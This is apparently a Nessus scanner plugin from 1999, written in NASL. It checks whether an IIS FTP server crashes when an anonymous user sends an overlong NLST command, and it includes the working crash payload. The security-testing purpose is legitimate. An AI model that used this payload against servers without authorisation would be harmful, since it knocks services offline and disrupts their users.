#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
#
# See the Nessus Scripts License for details
#

if(description)
{
 name["english"] = "IIS FTP server crash";
 name["francais"] = "Plantage du serveur FTP de IIS";
 script_name(english:name["english"],
 	     francais:name["francais"]);

 desc["english"] = string("It is possible to make the IIS FTP server close all the active connections by issuing a too long NLST command which will make the server crash. An attacker can use this flaw to prevent people from downloading data from your FTP server.\nRisk factor : Medium");

 desc["francais"] = string("Il est possible de forcer un serveur FTP IIS  fermer l'ensemble des connections actives en executant une commande 'NLST' ayant un argument trop long qui fera planter le serveur FTP. Un intrus peut utiliser ce problme pour empecher les gens de tlcharger des donnes  partir de votre serveur FTP.\nFacteur de risque: Moyen");
 script_description(english:desc["english"],
 		    francais:desc["francais"]);
 
 script_category(ACT_DENIAL);

 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"],
 	       francais:family["francais"]);

 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 script_dependencie("find_service.nes");

 summary["english"] = "Crashes an IIS ftp server";
 summary["francais"] = "Plante un serveur ftp IIS";
 script_summary(english:summary["english"],
 		francais:summary["francais"]);
		
 exit();
}

#
# The script code starts here
#

port = get_kb_item("Services/ftp");
if(!port)port = 21;
if(!get_port_state(port))exit(0);
soc = open_sock_tcp(port);
if(soc)
{
 if(ftp_log_in(socket:soc, user:"ftp", pass:"nessus@"))
 {
  port2 = ftp_get_pasv_port(socket:soc);
  if(!port2)exit(0);
  soc2 = open_sock_tcp(port2);
  command = string("NLST ", crap(320), "\n");
  send(socket:soc, data:command);
 }
 close(soc);
 close(soc2);
 
 soc3 = open_sock_tcp(port);
 if(!soc3)security_hole(port);
 else close(soc3);
}
 
  
 
